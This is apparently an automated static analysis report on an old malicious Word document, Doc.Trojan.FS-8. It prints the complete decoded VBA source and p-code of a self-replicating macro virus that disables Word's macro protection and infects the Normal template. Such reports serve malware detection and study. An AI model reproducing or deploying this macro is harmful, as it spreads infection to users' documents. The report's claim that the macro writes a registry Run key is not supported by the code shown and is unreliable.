Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 f3cc81b3502ffdfc…

MALICIOUS

Office (OLE)

Size: 26.5 KB
Created: 1999-07-17 18:01:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: 196d6e68397a4c19ae26e313ab8ea456
SHA-1: c39977029db572b8b8819daf8798f391e945fe5c
SHA-256: f3cc81b3502ffdfce75956732eca6d5a4739d9761d29e514f7a38297834115fc
Risk Score: 128

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

The sample contains a VBA macro that executes upon document close. This macro writes a new macro to the Normal template, which will execute when a new document is opened. The macro attempts to write to the registry key HKCU\Software\Microsoft\Windows\CurrentVersion\Run\IAccessible2Proxy, likely to establish persistence. The ClamAV detection 'Doc.Trojan.FS-8' and the presence of a Document_Open macro further indicate malicious intent.

Heuristics (4)

  • ClamAV: Doc.Trojan.FS-8 [severity: critical, rule: CLAMAV_DETECTION]
    ClamAV detected this file as malware: Doc.Trojan.FS-8
  • VBA macros detected [severity: medium, rule: OLE_VBA_MACROS, 2 related findings]
    Document contains VBA macro code
  • Document_Open macro [severity: high, rule: OLE_VBA_DOCOPEN]
    Document_Open macro
  • Environ() call (env variable access) [severity: low, rule: OLE_VBA_ENVIRON]
    Environ() call (env variable access)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename    | Kind      | Source                                                  | Size
macros.bas  | vba-macro | oletools.olevba.extract_macros (decoded VBA source)     | 3933 bytes
SHA-256: d241870e29c1cd19141edfd9fd43344dbbedad09d10e096d4f6d3abd1d8d1c8b

Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'Copyright (C) 1998 by FlyShadow ~^^~ - Plural
Private Sub Document_Close()
On Error Resume Next: γ = Environ("WINDIR") & ".\TEMP\"
Options.VirusProtection = 0: Options.SaveNormalPrompt = 0
η = FreeFile: Open γ & "&" For Output As #η
Print #η, VBProject.VBComponents(1).CodeModule.Lines(1, 20)
Close #η: Open γ & "&&" For Output As #η
Print #η, "Private Sub Document_Open()"
Print #η, "On Error Resume Next: γ = Environ(" & Chr(34) & "WINDIR" & Chr(34) & ")" & "&" & Chr(34) & ".\TEMP\" & Chr(34)
Print #η, "Set ι = ActiveDocument.VBProject.VBComponents(1).Codemodule"
Print #η, "ι.Deletelines 1, ι.CountOfLines"
Print #η, "ι.AddFromFile (γ & " & Chr(34) & "&" & Chr(34) & ")"
Print #η, "End Sub": Close #η
Set ι = NormalTemplate.VBProject.VBComponents(1).CodeModule
ι.Deletelines 1, ι.CountOfLines: ι.AddFromFile (γ & "&&")
End Sub

' Processing file: /opt/analyzer/scan_staging/815b6edd03494174a55148f15239843c.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 2451 bytes
' Line #0:
' 	QuoteRem 0x0000 0x002D "Copyright (C) 1998 by FlyShadow ~^^~ - Plural"
' Line #1:
' 	FuncDefn (Private Sub Document_Close())
' Line #2:
' 	OnError (Resume Next) 
' 	BoS 0x0000 
' 	LitStr 0x0006 "WINDIR"
' 	ArgsLd Environ 0x0001 
' 	LitStr 0x0007 ".\TEMP\"
' 	Concat 
' 	St γ 
' Line #3:
' 	LitDI2 0x0000 
' 	Ld Options 
' 	MemSt VirusProtection 
' 	BoS 0x0000 
' 	LitDI2 0x0000 
' 	Ld Options 
' 	MemSt SaveNormalPrompt 
' Line #4:
' 	Ld Friend 
' 	St η 
' 	BoS 0x0000 
' 	Ld γ 
' 	LitStr 0x0001 "&"
' 	Concat 
' 	Ld η 
' 	Sharp 
' 	LitDefault 
' 	Open (For Output)
' Line #5:
' 	Ld η 
' 	Sharp 
' 	PrintChan 
' 	LitDI2 0x0001 
' 	LitDI2 0x0014 
' 	LitDI2 0x0001 
' 	Ld VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemLd Lines 0x0002 
' 	PrintItemNL 
' Line #6:
' 	Ld η 
' 	Sharp 
' 	Close 0x0001 
' 	BoS 0x0000 
' 	Ld γ 
' 	LitStr 0x0002 "&&"
' 	Concat 
' 	Ld η 
' 	Sharp 
' 	LitDefault 
' 	Open (For Output)
' Line #7:
' 	Ld η 
' 	Sharp 
' 	PrintChan 
' 	LitStr 0x001B "Private Sub Document_Open()"
' 	PrintItemNL 
' Line #8:
' 	Ld η 
' 	Sharp 
' 	PrintChan 
' 	LitStr 0x0023 "On Error Resume Next: γ = Environ("
' 	LitDI2 0x0022 
' 	ArgsLd Chr 0x0001 
' 	Concat 
' 	LitStr 0x0006 "WINDIR"
' 	Concat 
' 	LitDI2 0x0022 
' 	ArgsLd Chr 0x0001 
' 	Concat 
' 	LitStr 0x0001 ")"
' 	Concat 
' 	LitStr 0x0001 "&"
' 	Concat 
' 	LitDI2 0x0022 
' 	ArgsLd Chr 0x0001 
' 	Concat 
' 	LitStr 0x0007 ".\TEMP\"
' 	Concat 
' 	LitDI2 0x0022 
' 	ArgsLd Chr 0x0001 
' 	Concat 
' 	PrintItemNL 
' Line #9:
' 	Ld η 
' 	Sharp 
' 	PrintChan 
' 	LitStr 0x003C "Set ι = ActiveDocument.VBProject.VBComponents(1).Codemodule"
' 	PrintItemNL 
' Line #10:
' 	Ld η 
' 	Sharp 
' 	PrintChan 
' 	LitStr 0x0021 "ι.Deletelines 1, ι.CountOfLines"
' 	PrintItemNL 
' Line #11:
' 	Ld η 
' 	Sharp 
' 	PrintChan 
' 	LitStr 0x0015 "ι.AddFromFile (γ & "
' 	LitDI2 0x0022 
' 	ArgsLd Chr 0x0001 
' 	Concat 
' 	LitStr 0x0001 "&"
' 	Concat 
' 	LitDI2 0x0022 
' 	ArgsLd Chr 0x0001 
' 	Concat 
' 	LitStr 0x0001 ")"
' 	Concat 
' 	PrintItemNL 
' Line #12:
' 	Ld η 
' 	Sharp 
' 	PrintChan 
' 	LitStr 0x0007 "End Sub"
' 	PrintItemNL 
' 	BoS 0x0000 
' 	Ld η 
' 	Sharp 
' 	Close 0x0001 
' Line #13:
' 	SetStmt 
' 	LitDI2 0x0001 
' 	Ld NormalTemplate 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	Set ι 
' Line #14:
' 	LitDI2 0x0001 
' 	Ld ι 
' 	MemLd CountOfLines 
' 	Ld ι 
' 	ArgsMemCall Deletelines 0x0002 
' 	BoS 0x0000 
' 	Ld γ 
' 	LitStr 0x0002 "&&"
' 	Concat 
' 	Paren 
' 	Ld ι 
' 	ArgsMemCall AddFromFile 0x0001 
' Line #15:
' 	EndSub